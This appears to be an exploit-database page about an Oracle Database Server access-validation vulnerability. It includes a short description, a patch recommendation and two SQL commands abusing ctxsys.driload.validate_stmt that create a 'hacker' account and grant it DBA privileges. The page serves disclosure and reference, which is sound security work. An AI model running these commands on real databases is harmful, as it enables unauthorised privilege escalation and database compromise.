header-logo
Suggest Exploit
vendor:
Oracle Database Server
by:
7.5
CVSS
HIGH
Access Validation
287
CWE
Product Name: Oracle Database Server
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE: a:oracle:database_server
Metasploit:
Other Scripts:
Platforms Tested:

Oracle Database Server Access Validation Vulnerability

The vulnerability allows unprivileged users to execute commands as the DBA, potentially compromising the database.

Mitigation:

Apply patches and updates provided by Oracle.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11099/info

Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.

SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');

Navigation

Suggest Exploit

Services By CQR